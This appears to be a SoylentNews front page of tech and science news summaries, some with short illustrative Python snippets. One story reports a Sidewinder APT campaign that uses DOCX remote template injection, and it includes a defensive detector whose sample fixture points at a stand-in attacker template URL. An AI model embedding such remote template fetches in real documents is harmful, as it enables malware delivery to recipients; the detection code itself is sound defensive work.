
posted by janrinok on Monday March 17, @10:53PM   Printer-friendly
from the one-law-for-thee... dept.

Arthur T Knackerbracket has processed the following story:

The ChatGPT developer submitted an open letter full of proposals to the White House Office of Science and Technology Policy (OSTP) regarding the Trump administration's AI Action Plan, currently under development.

It outlines the super-lab's views on how the White House can support the American AI industry. This includes putting in place a regulatory regime – but one that "ensures the freedom to innovate," of course; an export strategy to let America exert control over its allies while locking out enemies like China; and adopting measures to drive growth, including for federal agencies to "set an example" on adoption.

The suggestions regarding copyright display a certain amount of hubris. It talks up the "longstanding fair use doctrine" of American copyright law, and claims this is "even more critical to continued American leadership on AI in the wake of recent events in the PRC," presumably referring to the interest generated by China's DeepSeek earlier this year.

America has so many AI startups because the fair use doctrine promotes AI development, OpenAI says, while "rigid copyright rules are repressing innovation and investment" in other markets, singling out the European Union for allowing "opt-outs" for rights holders.

The biz previously claimed it would be "impossible" to build top-tier AI models that meet today's needs without using people's copyrighted work.

It proposes that the US government "take steps to ensure that our copyright system continues to support American AI leadership," and that it shapes international policy discussions around copyright and AI, "to prevent less innovative countries from imposing their legal regimes on American AI firms and slowing our rate of progress."

Not content with that, OpenAI wants the US government to actively assess the level of data available to American AI firms and "determine whether other countries are restricting American companies' access to data and other critical inputs."

Dr Ilia Kolochenko, CEO at ImmuniWeb and an Adjunct Professor of Cybersecurity at Capitol Technology University in Maryland, expressed concern over OpenAI's proposals.

"Arguably, the most problematic issue with the proposal – legally, practically, and socially speaking – is copyright," Kolochenko told The Register.

"Paying a truly fair fee to all authors – whose copyrighted content has already been or will be used to train powerful LLM models that are eventually aimed at competing with those authors – will probably be economically unviable," he claimed, as AI vendors "will never make profits."

Advocating for a special regime or copyright exception for AI technologies is a slippery slope, he argues, adding that US lawmakers should regard OpenAI's proposals with a high degree of caution, mindful of the long-lasting consequences they may have on the American economy and legal system.

OpenAI also proposes maintaining the three-tiered AI diffusion rule framework, but with some alterations to encourage other nations to commit "to deploy AI in line with democratic principles set out by the US government."

The stated aim of this strategy is "to encourage global adoption of democratic AI principles, promoting the use of democratic AI systems while protecting US advantage."

OpenAI talks of expanding market share in Tier I countries (US allies) through the use of "American commercial diplomacy policy," banning the use of China-made equipment (think Huawei) and so on.

The ChatGPT lab also proposes that "AI Economic Zones" be created in America by local, state, and federal governments together with industry, which sounds similar to the UK government's "AI Growth Zones."

These would be intended to "speed up the permitting for building AI infrastructure like new solar arrays, wind farms, and nuclear reactors," and would allow exclusions from the National Environmental Policy Act, which requires federal agencies to evaluate the environmental impacts of their actions.

Finally, OpenAI proposes that federal agencies should "lead by example" on AI adoption. Uptake in federal departments and agencies remains "unacceptably low," the Microsoft-championed lab says, and wants to see the "removal of known blockers to the adoption of AI tools, including outdated and lengthy accreditation processes, restrictive testing authorities, and inflexible procurement pathways."

Google has also put out its response [PDF] to the White House's action plan call, arguing also for fair use defenses and data-mining exceptions for AI training.


Original Submission

posted by janrinok on Monday March 17, @06:11PM   Printer-friendly
from the WWW-or-not dept.

For the third time in recent memory, CloudFlare has blocked large swaths of niche browsers and their users from accessing web sites that CloudFlare gate-keeps. In the past these issues have been resolved quickly (within a week) and apologies issued with promises to do better:
2024-03-11: Cloudflare checks broken again?
2024-07-08: Cloudflare checks broken yet AGAIN?
2025-01-30: Cloudflare Verification Loop issues

This time around it has been over 6 weeks and CloudFlare has been unable or unwilling to fix the problem on their end, effectively stalling any progress on the matter with various tactics including asking browser developers to sign overarching NDAs:
Re: CloudFlare: summary and status

Some of the affected browsers:
• Pale Moon
• Basilisk
• Waterfox
• Falkon
• SeaMonkey
• Various Firefox ESR flavors
• Thorium (on some systems)
• Ungoogled Chromium

From the main developer of Pale Moon:

Our current situation remains unchanged: CloudFlare is still blocking our access to websites through the challenges, and the captcha/turnstile continues to hang the browser until our watchdog terminates the hung script after which it reloads and hangs again after a short pause (but allowing users to close the tab in that pause, at least). To say that this upsets me is an understatement. Other than deliberate intent or absolute incompetence, I see no reason for this to endure. Neither of those options are very flattering for CloudFlare.

I wish I had better news.


Original Submission

posted by janrinok on Monday March 17, @01:23PM   Printer-friendly
from the Cryptology-and-Glowies dept.

From https://www.nist.gov/news-events/news/2025/03/nist-selects-hqc-fifth-algorithm-post-quantum-encryption

NIST has chosen a new algorithm for post-quantum encryption called HQC, which will serve as a backup for ML-KEM, the main algorithm for general encryption.
HQC is based on different math than ML-KEM, which could be important if a weakness were discovered in ML-KEM.
NIST plans to issue a draft standard incorporating the HQC algorithm in about a year, with a finalized standard expected in 2027.
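HQC, like ML-KEM, is a key-encapsulation mechanism (KEM), so any implementation exposes the same three operations: key generation, encapsulation, and decapsulation. As a rough illustration of that interface only, here is a toy ElGamal-style KEM in Python; it is not HQC, not code-based, and not secure (the parameters are tiny and classical):

```python
import hashlib
import secrets

# Toy group parameters: illustrative only, far too weak for real use.
P = 2**127 - 1   # a Mersenne prime
G = 3

def keygen():
    """Generate a (private, public) key pair."""
    sk = secrets.randbelow(P - 2) + 1
    pk = pow(G, sk, P)
    return sk, pk

def encapsulate(pk):
    """Return (ciphertext, shared_secret) bound to the public key."""
    r = secrets.randbelow(P - 2) + 1
    ct = pow(G, r, P)
    ss = hashlib.sha256(pow(pk, r, P).to_bytes(16, "big")).digest()
    return ct, ss

def decapsulate(sk, ct):
    """Recover the shared secret from the ciphertext."""
    return hashlib.sha256(pow(ct, sk, P).to_bytes(16, "big")).digest()

sk, pk = keygen()
ct, ss_sender = encapsulate(pk)
assert decapsulate(sk, ct) == ss_sender  # both sides derive the same secret
```

Real HQC replaces the group arithmetic with error-correcting-code operations, but the keygen/encapsulate/decapsulate contract is the same, which is what lets it serve as a drop-in backup for ML-KEM.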

The overall process at NIST is https://en.wikipedia.org/wiki/NIST_Post-Quantum_Cryptography_Standardization

The algo's "homepage" seems to be https://pqc-hqc.org/

Currently there seems to be only a C++ implementation; has anyone found other implementations? Have you upgraded your software, including SN, to PQC?


Original Submission

posted by janrinok on Monday March 17, @08:36AM   Printer-friendly
from the It's-Gnat-Large dept.

Here's the Story

If you thought the Raspberry Pi's chip was dinky, well, get a load of the nattily named Texas Instruments MSPM0C1104, said to be the world's smallest microcontroller (MCU), measuring a mere 1.38 mm².

If you look carefully at the image [...] , you can just make out the eight ball-grid connectors on the tiny 1.38 mm² chip package. In other words, that almost-invisible thing isn't just the silicon inside, but the entire chip package, the equivalent of a fully packaged CPU from Intel or AMD. Yup, mind veritably blown. For reference, the package for the Broadcom BCM2712 chip that powers the Raspberry Pi 5 measures about 20 mm on a side, or roughly 400 mm². So you could fit a couple of hundred of these things in the space the Broadcom BCM2712 takes up.

[...]

Despite its diminutive proportions, which Texas Instruments claims are 38% smaller than any other MCU's, this teensy speck of a chip packs a fully functional Arm 32-bit Cortex-M0+ CPU core running at a towering 24 MHz. It also has 16 KB of flash memory and 1 KB of SRAM.


Original Submission

posted by hubie on Monday March 17, @03:50AM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

The European Space Agency this week inaugurated its new supercomputing facility built with HPE.

The aptly named "Space HPC" facility is billed as being "demonstrator infrastructure" designed to help Europe's space industry "mitigate risks associated with data processing, modelling, and simulations."

Located in the Italian town of Frascati, 20km outside Rome, Space HPC houses a machine packing 34,000 cores' worth of the "latest generation of AMD & Intel processors." 108 Nvidia H100 GPUs are also present, giving the machine 5 petaflops of raw performance potential.

That power would see Space HPC ranked in around 210th place on the current Top 500 List of Earth's mightiest supercomputers.

The machine uses InfiniBand networking, packs 156 TB of RAM, and includes 3.6 PB of solid state disk storage.

Direct liquid cooling allowed it to bag a power usage effectiveness score of "below 1.09." The machine is also plumbed into the heating system of the campus where it resides.
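Power usage effectiveness is simply the ratio of total facility power to the power delivered to the IT equipment, so a figure below 1.09 means under 9 percent of the facility's power goes to cooling and distribution overhead. A quick illustration (the kW figures here are invented, not ESA's):

```python
def pue(total_facility_kw: float, it_load_kw: float) -> float:
    """Power usage effectiveness: total facility power over IT load."""
    return total_facility_kw / it_load_kw

# Hypothetical numbers: 1,000 kW of IT load plus 85 kW of cooling/overhead.
print(round(pue(1085, 1000), 3))  # 1.085, i.e. "below 1.09"
```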

As is usually the case with supercomputers, Space HPC can be configured to run different workloads. The machine therefore offers partitions dedicated to general compute tasks, and two other partitions that take advantage of the H100s to run AI/ML workloads or other software that needs accelerators.

ESA's Space Safety Programme has already tested Space HPC to improve its ability to – you guessed it – model space weather. Among other things, it can improve warnings of future solar activity that could pose a danger to infrastructure in orbit or on the ground.

[...] The org is, however, already considering expressions of interest for time on the machine via a form you can find here.


Original Submission

posted by hubie on Sunday March 16, @11:07PM   Printer-friendly

Quaise Energy reaches back to push geothermal power forward

https://newatlas.com/energy/quaise-energy-reaches-back-push-geothermal-power-forward/

Quaise Energy has been dazzling us lately with its bleeding-edge plans to tap super-deep, superheated steam as a global power source. Now, the company's reaching back over a century to adapt yesterday's technology for tomorrow's energy.

Quaise Energy can't be accused of being unambitious. Geothermal power has a tremendous potential for providing humanity with unlimited energy for the foreseeable future, but it suffers from the fact that it's only really practical in a few places where the sources of subterranean heat are close enough to the surface to be easily tapped.

What Quaise Energy wants to do is get around this by going straight to the source. In other words, instead of waiting for the heat to come to us, we go to the heat, using a traditional rotary drill bit and a gyrotron-powered energy beam to burrow up to an incredible 12.4 miles (20 km) into a region in the Earth's crust that is heated to 500 °C (932 °F).

Not only would this make geothermal power accessible in almost any place that isn't a high mountain chain, it also brings a bonus. At this depth and that heat, water is heated and squashed to the point where it is supercritical. That is, when the temperature is above 373.9 °C (705.2 °F) and the pressure is over 218 atmospheres, the water enters a state where it is neither a liquid nor a gas. Instead, it behaves as a single homogeneous fluid and shifts from being an almost-liquid to an almost-gas depending on the current conditions.

When in a supercritical state, water has lower viscosity than liquid water, yet higher than steam, allowing for improved flow dynamics in turbines and heat exchangers. It also has lower thermal conductivity than liquid water but higher than that of dry steam, aiding heat transfer. It expands very rapidly when depressurized, and its specific heat capacity changes dramatically near the critical point, allowing for efficient energy absorption. This gives it higher thermal efficiency and the ability to hold 10 times more energy than regular water or steam.
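The thresholds quoted above translate directly into a check for whether a given temperature and pressure put water past its critical point. A simplified sketch (real phase behavior near the critical point is more subtle than a pair of inequalities):

```python
T_CRIT_C = 373.9     # critical temperature of water, degrees C (from above)
P_CRIT_ATM = 218.0   # critical pressure of water, atmospheres (from above)

def water_is_supercritical(temp_c: float, pressure_atm: float) -> bool:
    """True when both temperature and pressure exceed the critical point."""
    return temp_c > T_CRIT_C and pressure_atm > P_CRIT_ATM

print(water_is_supercritical(500, 300))  # conditions Quaise targets: True
print(water_is_supercritical(150, 5))    # a shallow geothermal well: False
```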

If that isn't enough, it can even clean the pipes it's flowing through thanks to its ability to dissolve salts and other impurities.

[...] The question is, how to make it work? For the answer, Quaise went back to the first geothermal plant, Larderello 1, that opened in Italy in 1914. Instead of having one loop with water going into the Earth and then returning steam to the surface, this used two loops of water with one collecting the heat deep underground and the second swapping the heat from the first to bring it to the turbines on the surface.

[...] "The applications are diverse, from power plants to regional heating to domestic ground-source heat pumps, and there are a lot of fresh new eyes on the field," said Daniel W. Dichter of Quaise Energy. "There's a renaissance happening in geothermal right now."

Geothermal Could Power Nearly All New Data Centers Through 2030

Geothermal could power nearly all new data centers through 2030:

There's a power crunch looming as AI and cloud providers ramp up data center construction. But a new report suggests that a solution lies beneath their foundations.

Advanced geothermal power could supply nearly two-thirds of new data center demand by 2030, according to an analysis by the Rhodium Group. The additions would quadruple the amount of geothermal power capacity in the U.S. — from 4 gigawatts to about 16 gigawatts — while costing the same or less than what data center operators pay today.

In the western U.S., where geothermal resources are more plentiful, the technology could provide 100% of new data center demand. Phoenix, for example, could add 3.8 gigawatts of data center capacity without building a single new conventional power plant.

Geothermal resources have enormous potential to provide consistent power. Historically, geothermal power plants have been limited to places where Earth's heat seeps close to the surface. But advanced geothermal techniques could unlock 90 gigawatts of clean power in the U.S. alone, according to the U.S. Department of Energy.

Advanced or enhanced geothermal encompasses a wide range of approaches, but generally they drill deeper and wider than before. That allows them to access hotter rocks — which translates into more power — and pack more geothermal wells onto a single property. The sector has seen a surge of startups in recent years, driven in part by knowledge and technology borrowed from oil and gas companies.

Fervo Energy, for example, was founded by former oil and gas engineers to expand geothermal's potential using horizontal drilling techniques perfected over the last few decades. The company raised over $200 million in 2024 on the heels of significant cost reductions in well drilling.

Another startup, Bedrock Energy, is drilling deep to minimize geothermal's footprint, allowing space-constrained office buildings and data centers to extract more power from their limited footprints. The company's specialized drilling rigs bore down more than 1,200 feet to tap consistent heat year-round.

Quaise Energy's technology sounds like something out of science fiction. The startup vaporizes rock using microwaves generated by gyrotrons. By skipping traditional drill bits, Quaise hopes to drill as deep as 12.4 miles (20 kilometers). At that depth, the rocks are nearly 1,000°F year-round, offering nearly limitless amounts of heat to drive generators or warm buildings.

While most companies are using Earth's ability to provide and store heat, another startup is using it to store energy another way. Sage Geosystems has been injecting water into wells under pressure. When power is needed, it can open the taps and run the water through a turbine, sort of like an upside-down hydroelectric dam.

Because geothermal power has very low running costs, its price is competitive with data centers' energy costs today, the Rhodium report said. When data centers are sited similarly to how they are today, a process that typically takes into account proximity to fiber optics and major metro areas, geothermal power costs just over $75 per megawatt hour.

But when developers account for geothermal potential in their siting, the costs drop significantly, down to around $50 per megawatt hour.

The report assumes that new generating capacity would be "behind the meter," which is what experts call power plants that are hooked up directly to a customer, bypassing the grid. Wait times for new power plants to connect to the grid can stretch on for years. As a result, behind the meter arrangements have become more appealing for data center operators who are scrambling to build new capacity.
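To put those per-megawatt-hour figures in context, the gap compounds quickly at data-center scale. A back-of-the-envelope sketch for a hypothetical 100 MW facility running at 90 percent utilization (both of those assumptions are ours, not the Rhodium report's):

```python
HOURS_PER_YEAR = 8760

def annual_energy_cost(capacity_mw: float, utilization: float,
                       price_per_mwh: float) -> float:
    """Yearly energy bill in dollars for a constant average load."""
    return capacity_mw * HOURS_PER_YEAR * utilization * price_per_mwh

for price in (75, 50):  # today's siting vs geothermal-optimized siting
    cost = annual_energy_cost(100, 0.90, price)
    print(f"${price}/MWh -> ${cost / 1e6:.1f}M per year")
```

Under these assumptions the $25/MWh difference works out to roughly $20 million per year for a single facility.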


Original Submission #1 | Original Submission #2

posted by hubie on Sunday March 16, @06:20PM   Printer-friendly
from the old-child-abuse-and-terrorism-excuse dept.

Apple's encrypted data case against the UK government has begun in secret at the Royal Courts of Justice:

The Home Office has demanded the right to access data from Apple users who have turned on Advanced Data Protection (ADP), a tool that prevents anyone other than the user - including the tech giant - from reading their files.

Apple says it is important for privacy - but the UK government says it needs to be able to access data if there is a national security risk.

The BBC - along with civil liberties groups and some US politicians - argue the case should be heard in public.

But Friday's session of the Investigatory Powers Tribunal - which is hearing the matter - was held behind closed doors.

[...] The case is about balancing national security against privacy rights.

ADP is end-to-end encrypted, meaning no-one can access files that have been secured with it apart from their owner.

Other end-to-end encrypted services in the UK include Signal, Meta's WhatsApp, and Apple's iMessage.

In February, it emerged the UK government was seeking the right to be able to access data protected in this way using powers granted to it under the Investigatory Powers Act.

The Act allows it to compel firms to provide information to law enforcement agencies.

Apple responded by pulling ADP in the UK and then launching legal action to challenge the government's demand.

Apple says agreeing to what the UK is asking for would require the creation of a so-called backdoor, a capability critics say would eventually be exploited by hackers.

"As we have said many times before, we have never built a backdoor or master key to any of our products or services and we never will," Apple says on its website.

The Home Office has previously told the BBC: "The UK has a longstanding position of protecting our citizens from the very worst crimes, such as child sex abuse and terrorism, at the same time as protecting people's privacy.

"The UK has robust safeguards and independent oversight to protect privacy and privacy is only impacted on an exceptional basis, in relation to the most serious crimes and only when it is necessary and proportionate to do so."


Original Submission

posted by hubie on Sunday March 16, @01:34PM   Printer-friendly

Five years ago, on March 11, 2020, the World Health Organization declared COVID-19 a pandemic. Whether it still is depends on who you ask. There are no clear criteria to mark the end of a pandemic, and the virus that causes the disease — SARS-CoV-2 — continues evolving and infecting people worldwide.

“Whether the pandemic ended or not is an intellectual debate,” says clinical epidemiologist and long COVID researcher Ziyad Al-Aly of Washington University in St. Louis. “For the family that lost a loved one a week ago in the ICU, that threat is real. That pain is real. That loss is real.”

According to recent WHO data, 521 people in the United States died of COVID-19 in the last week of 2024. That’s drastically lower than at the height of the pandemic in 2020. Nearly 17,000 people died of COVID-19 the last week of that year.

Dropping death and hospitalization rates, largely due to vaccinations and high levels of immunity, led to WHO and the United States ending their COVID-19 public health emergencies in 2023. The U.S. government has since reduced reporting of infections and access to free vaccines, tests and treatments. In the last two years, health professionals, scientists and policymakers have shifted to managing COVID-19 as an endemic disease, one that’s always present and may surge at certain times of the year.

Over the last five years, researchers have learned heaps about the virus and how to thwart it. But the pandemic also provided insights into health inequities, flaws in health care systems and the power of collaboration. But it’s hard to predict how the United States and other countries will manage COVID-19 going forward, let alone future pandemics.

[...] Long COVID can affect nearly every organ system. People think about it [as causing] brain fog and fatigue. Those can be symptoms of long COVID, but it's much more than that. We have people with heart problems, kidney problems and metabolic problems. In some individuals, long COVID can be mild and not disabling. But in others, it can be severely disabling, to the point of people being in bed and losing their jobs.

Unfortunately, we haven’t really cracked the code for treating long COVID. There are still no established treatments approved by the FDA.

[...] Some of the biggest threats are people being fatigued with COVID [news] and the amount of misinformation and disinformation.

If a pandemic breaks out in March 2025, I predict that vaccine uptake would be way less than it was for COVID-19, and there would be less enthusiasm for masking and a lot of the public health measures that protected millions of people in the U.S.

Scientists across the globe dropped everything they were doing and said, “Okay, we’re going to focus on long COVID.” There’s no other condition that, within the span of five years, we have this many academic publications — about 40,000 and counting.

Then, really the patient community that led the way. Patients with long COVID helped us understand that long COVID is happening, alerted the medical community and guided us in every step of the way in understanding long COVID.

Z. Al-Aly et al. Long COVID science, research and policy. Nature Medicine. Vol. 30, August 2024, p. 2148. doi: 10.1038/s41591-024-03173-6.


Original Submission

posted by hubie on Sunday March 16, @08:46AM   Printer-friendly
from the old-reliable-DOCX dept.

Arthur T Knackerbracket has processed the following story:

Kaspersky described Sidewinder as a "highly prolific" advanced persistent threat (APT) group whose previous prey were mostly government and military institutions in China, Pakistan, Sri Lanka, and parts of Africa.

Its recent wider expansion into Africa has caught researchers' attention. Sidewinder ramped up attacks in Djibouti in 2024 and has since focused its attention on Egypt, representing a shift in tactics.

Part of that shift is the increase in attacks against nuclear power plants and other nuclear energy organizations, particularly in South Asia.

Sidewinder, which launched in 2012 and has suspected but not formally confirmed roots in India, hasn't changed its attack methodology much, still relying on old remote code execution (RCE) bugs that are exploited by malicious documents delivered in spear-phishing campaigns.

"The attacker sends spear-phishing emails with a DOCX file attached," said Kaspersky researchers Giampaolo Dedola and Vasily Berdnikov. "The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker.

"The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process that leads to the installation of malware we have named Backdoor Loader. This acts as a loader for StealerBot, a private post-exploitation toolkit used exclusively by Sidewinder."
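The remote-template trick described above is visible in a document's relationship metadata: a DOCX is a ZIP archive, and an externally attached template shows up as a relationship entry pointing at a remote URL. A minimal detector sketch, scanning the `.rels` parts of an archive (the sample archive and attacker URL below are fabricated for illustration):

```python
import io
import re
import zipfile

def find_remote_templates(docx_bytes: bytes) -> list[tuple[str, str]]:
    """Return (rels part, URL) pairs for external attachedTemplate relationships."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            xml = z.read(name).decode("utf-8", errors="replace")
            # External relationships carry TargetMode="External"; attached
            # templates use the .../attachedTemplate relationship type.
            for m in re.finditer(r'<Relationship\b[^>]*>', xml):
                tag = m.group(0)
                if 'TargetMode="External"' in tag and "attachedTemplate" in tag:
                    target = re.search(r'Target="([^"]+)"', tag)
                    if target:
                        hits.append((name, target.group(1)))
    return hits

# Fabricated sample: a one-entry rels part pointing at a remote template.
rels = ('<?xml version="1.0"?><Relationships>'
        '<Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/'
        'relationships/attachedTemplate" '
        'Target="http://attacker.example/template.rtf" TargetMode="External"/>'
        '</Relationships>')
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("word/_rels/settings.xml.rels", rels)
print(find_remote_templates(buf.getvalue()))
```

A regex scan like this is only a triage heuristic; a production scanner would parse the XML properly and resolve the relationship types.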

The StealerBot implant was first identified in 2024, but Sidewinder has continued to use and refine it in ongoing campaigns. Kaspersky noted that the implant has remained unchanged since its discovery, but the group appears to be developing new iterations of its loader regularly.

The fake documents attached to spear-phishing emails are carefully crafted and appear legitimate upon a cursory inspection. They are also tailored for each target.

[...] The group's main tactics – phishing and an eight-year-old vulnerability – don't immediately bear the hallmarks of a sophisticated bunch of attackers. Kaspersky made the same observation in its previous report on the group but suspects those behind the attacks are highly skilled.

"Sidewinder has already demonstrated its ability to compromise critical assets and high-profile entities, including those in the military and government. We know [of] the group's software development capabilities, which became evident when we observed how quickly they could deliver updated versions of their tools to evade detection, often within hours."

The fact that it uses well-maintained and effective in-memory malware such as StealerBot also suggests that Sidewinder's various capabilities make it "a highly advanced and dangerous adversary," as Kaspersky puts it.


Original Submission

posted by janrinok on Sunday March 16, @04:01AM   Printer-friendly

SpaceX launches astronauts for long-awaited International Space Station crew swap:

SpaceX successfully launched four people into space on Friday, beginning a mission that will give the International Space Station enough crew members to allow astronauts Suni Williams and Butch Wilmore to return to Earth after their nine-month stay.

The mission, known as Crew-10, will see SpaceX's Dragon spacecraft dock with the International Space Station (ISS) late Saturday. The new astronauts will overlap with the existing crew for a few days before Williams and Wilmore (along with two others) return to our planet. That could happen as soon as March 19, weather permitting.

SpaceX crew launches to the ISS have become routine, but this mission has been hotly anticipated because of how Williams and Wilmore got to the station in the first place — and because SpaceX CEO Elon Musk has blamed their prolonged stay on former President Joe Biden.

The duo was part of the first crewed launch of Boeing's Starliner spacecraft last June. The test mission was supposed to be a crucial milestone in Boeing's quest to compete with SpaceX for these types of crewed launches to the ISS.

Starliner was supposed to dock with the ISS for 10 days before returning Williams and Wilmore to Earth. But the spacecraft experienced leaks and thruster problems, which delayed Starliner from docking with the ISS.

Starliner eventually coupled with the station and the astronauts were able to board. But Boeing and NASA spent weeks performing testing and analysis before they decided in August to bring Starliner back to Earth empty.

NASA and SpaceX agreed to bring the astronauts home on the next crewed mission to the ISS, Crew-9. They bumped two astronauts off that flight to accommodate the return of Williams and Wilmore. A return flight was slated for February 2025; an earlier flight would have left the ISS understaffed, according to NASA.

While Williams and Wilmore have been aboard the ISS, though, Musk finished helping Donald Trump get elected for a second time, and began his rampage through the federal government with his Department of Government Efficiency. Musk started saying — both on X and in interviews — that he offered to bring the astronauts back earlier but that Biden refused because of political reasons.

Musk has not provided any evidence to support this claim. NASA's former administrator and deputy administrator under Biden have both said that no offer from Musk made it to the space agency's headquarters.


Original Submission

posted by janrinok on Saturday March 15, @11:17PM   Printer-friendly
from the but-some-may-be-rather-like-peninsulas dept.

Author, sysadmin, and Grumpy BSD Guy, Peter N M Hansteen, has written a post about Software Bill of Materials (SBOM) and how they relate to all software, both proprietary and Free and Open Source Software (FOSS). Increasingly, maintaining a machine-readable inventory of runtime and build dependencies in the form of an SBOM is becoming the cost of doing business, even for FOSS projects.

Whether you let others see the code you wrote or not, the software does not exist in isolation.

All software has dependencies, and in the open source world this fact has been treated as a truth out in the open. Every free operating system, and in fact most modern-ish programming languages, come with a package system to install software and to track and handle the web of dependencies, and you are supposed to use the corresponding package manager for the bulk of maintenance tasks.

So when the security relevant incidents hit, the open source world was fairly well stocked with code that did almost all the things that were needed for producing what became known as Software Bill of Materials, or SBOM for short.

So what would a Software Bill of Materials even look like?

Obviously nuts and bolts would not be involved, but items such as the source code files in your project and any libraries or tools needed to build the thing would be nice-to-knows. And once you have the thing built, whatever other things -- libraries, suites of utilities, services that are required to be running, or other software frameworks of any kind -- are required in order to have the thing run are obvious items of interest.

So basically, any item your code would need comes out as a dependency, and you will find that your code has both build time and run time dependencies.

There is increasing agreement that SBOMs are now necessary. The question is now becoming how to implement them without adding undue burdens onto developers or even onto whole development teams. Perhaps the way would be to separate out the making of these machine-readable inventories similarly to how packaging is generally separate from the main development activities.
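As a concrete sketch of what such a machine-readable inventory can look like, here is a minimal generator that emits a CycloneDX-style JSON document from a hand-written dependency list (the field names follow the CycloneDX 1.x shape; the package names and versions are invented for illustration):

```python
import json

def make_sbom(app_name: str, app_version: str, deps: list[dict]) -> str:
    """Build a minimal CycloneDX-style SBOM as a JSON string."""
    bom = {
        "bomFormat": "CycloneDX",
        "specVersion": "1.5",
        "metadata": {"component": {"type": "application",
                                   "name": app_name,
                                   "version": app_version}},
        "components": [
            # scope distinguishes required run-time deps from optional ones
            {"type": "library", "name": d["name"], "version": d["version"],
             "scope": d.get("scope", "required")}
            for d in deps
        ],
    }
    return json.dumps(bom, indent=2)

# Invented example dependencies for a hypothetical tool.
print(make_sbom("mytool", "1.0.0", [
    {"name": "libexample", "version": "2.4.1"},
    {"name": "examplewidgets", "version": "0.9", "scope": "optional"},
]))
```

In practice this list would be harvested from the package manager or build system rather than written by hand, which is exactly the separation-of-concerns argument the post makes.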

Previously:
(2023) Managing Open Source Software and Software Bill of Materials
(2022) Open Source Community Sets Out Path to Secure Software


Original Submission

posted by janrinok on Saturday March 15, @06:33PM   Printer-friendly

https://phys.org/news/2025-03-rapidly-population-crocs-impacting-australia.html

A team of marine biologists, environmental researchers and land management specialists affiliated with several institutions in Australia, working with a colleague from Canada, has conducted a study of the ecological impact of a huge rise in the population of saltwater crocodiles in Australia's Northern Territory.

In their paper published in the journal Proceedings of the Royal Society B: Biological Sciences, the group describes what they learned about changes in croc size, diet, and the sharp rise in nutrients they excrete into the water system.

Fifty-four years ago, the Australian government banned the hunting of saltwater crocodiles in the Northern Territory. Since that time, the population of crocs has grown from approximately 1,000 to approximately 100,000. The research team wondered about the ecological impact of such a rapid change and, more specifically, whether it was possible to quantify the changes that had taken place.

The work involved conducting two major studies. The first involved analyzing data amassed by various researchers over the past half-century and using it to conduct bioenergetic modeling of croc size and population. The team then used the models to estimate consumption rates of the various foods the crocs have been eating, along with what they were excreting and how much.

The other study involved analyzing bones that have been recovered in the region over the years 1970 to 2022. From these, the team was able to learn more about what the crocs had been eating and how much by measuring carbon and nitrogen isotopes.

The researchers found that the size of the crocs has been growing slightly and that increases in population have led to a total biomass increase from an average of 10 kg to 400 kg per kilometer of river. They also found that the amount of food eaten by the population as a whole increased approximately nine-fold. Additionally, the amounts of phosphorus and nitrogen excreted rose 56- and 186-fold respectively, with most of it going into the water.
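For scale, the fold-increases implied by these numbers are easy to check (a quick sketch using only the figures quoted in this summary):

```python
# Fold-increases implied by the figures quoted above.
population_growth = 100_000 / 1_000   # croc numbers since the hunting ban
biomass_growth = 400 / 10             # kg of croc per km of river

print(f"population: {population_growth:.0f}-fold")
print(f"biomass per km of river: {biomass_growth:.0f}-fold")
```

So the population grew a hundred-fold while per-kilometer biomass grew forty-fold, consistent with the crocs growing larger individually as well as more numerous.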

Journal Reference: Mariana A. Campbell et al, Quantifying the ecological role of crocodiles: a 50-year review of metabolic requirements and nutrient contributions in northern Australia, Proceedings of the Royal Society B: Biological Sciences (2025). DOI: 10.1098/rspb.2024.2260


Original Submission

posted by janrinok on Saturday March 15, @01:48PM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

A federal judge has dealt a blow to Elon Musk’s DOGE agenda. On Thursday, Judge William Alsup of San Francisco said that the firing of tens of thousands of federal probationary workers had been based on a “lie” and that the government had conducted the expulsions illegally—further calling the initiative a “sham.” Alsup ordered that the workers be reinstated immediately.

Probationary workers—that is, workers who are new to the workforce and haven’t received more advanced benefits and protections—have suffered massive cuts across the government, as DOGE and the Trump administration have attempted to greatly reduce the federal workforce. The case before Alsup concerns litigation brought by union groups representing those workers.

Alsup’s reinstatement order applies to thousands of federal workers fired from the Defense Department, the Department of Veterans Affairs, the Department of Agriculture, the Department of Energy, the Treasury Department, and the Department of the Interior. Government Executive reports that some 24,000 employees would regain their jobs as a result of the judge’s decision.

The government’s firing of the employees was illegitimate because the agencies impacted by the cuts were directed by the Office of Personnel Management to do so, Alsup said. The OPM does not have the authority to make such orders, as those orders could only be made by the agencies themselves, the judge concluded.

Many of the cuts in question took place not long after Musk’s DOGE initiative was announced and a team of Musk-linked workers took over the OPM. That team is said to have included numerous current and former employees of Musk, including Amanda Scales, a former Musk employee who was appointed chief of staff at the agency. On January 31, Reuters reported that Musk aides had locked career civil servants out of the computer systems at the agency and were engaged in some sort of undisclosed work involving said systems. Democratic lawmakers subsequently accused Musk of leading a “hostile takeover” of the agency.

On February 14, Reuters reported that, as part of the government downsizing initiative being led by Musk, the Trump administration had begun to fire “scores” of government employees, a majority of which were still on probation. A statement from the OPM at the time said that the Trump administration was “encouraging agencies to use the probationary period as it was intended: as a continuation of the job application process, not an entitlement for permanent employment.”

Charles Ezell, the acting director of the OPM, met with the heads of numerous federal agencies on February 13 and ordered them to fire tens of thousands of employees, according to the unions representing the workers. The government has claimed that Ezell was not issuing orders and was merely providing “guidance.” However, Alsup recently determined that the OPM had, indeed, ordered the firings, and done so illegally.

“The court finds that Office of Personnel Management did direct all agencies to terminate probationary employees with the exception of mission critical employees,” Alsup recently said.

The case before Alsup took a turn this week when Ezell abruptly refused a court order to testify about his role in the firings. “The problem here is that Acting Director Ezell submitted a sworn declaration in support of defendants’ position, but now refuses to appear to be cross-examined, or to be deposed,” Alsup said.

Alsup, a Clinton appointee, had harsh words for the Trump administration’s conduct, claiming that attorneys working for the government had attempted to mislead him. “The government, I believe, has tried to frustrate the judge’s ability to get at the truth of what happened here, and then set forth sham declarations,” he said. “That’s not the way it works in the U.S. District Court.”

